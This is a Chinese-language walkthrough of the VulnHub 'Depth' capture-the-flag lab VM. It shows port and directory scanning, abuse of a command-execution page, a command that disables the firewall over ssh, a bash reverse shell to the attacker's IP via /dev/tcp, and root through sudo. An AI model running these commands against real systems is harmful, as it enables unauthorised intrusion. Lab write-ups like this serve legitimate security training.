靶机安装
下载地址:https://download.vulnhub.com/depth/DepthB2R.ova
运行环境:VMware运行该虚拟机
信息收集
靶机IP发现
nmap 192.168.93.0/24
端口扫描
nmap -A 192.168.93.154 -p-
只开起了8080端口
进行目录扫描8080端口
dirsearch -u http://192.168.93.154:8080
有一个目录/test.jsp
IP网址访问
翻译过后为
后面拼接/test.jsp
翻译过后
提示我们输入 ls -l /tmp 测试一下
存在系统命令执行漏洞,进行利用,反弹shell尝试失败
漏洞利用
ls -l /home 查看到home目录内容,发现bill用户
输入ps aux,找出带有 “ps aux”的正在运行的进程,选项“ aux ”会打印系统中所有正在运行的进程。我们发现 sshd 服务正在使用中,但访问可能受到限制,nmap刚刚没有扫描出ssh的端口,可能存在防火墙。
尝试关闭防火墙
#尝试关闭防火墙
ssh bill@localhost sudo ufw disable
再次执行反弹shell
ssh bill@localhost bash -i >& /dev/tcp/192.168.93.130/8787 0>&1 
获取shell成功
提权
尝试sudo提权
sudo -l,发现所有用户(ALL)都有sudo权限,
直接 sudo su 命令
查看flag文件
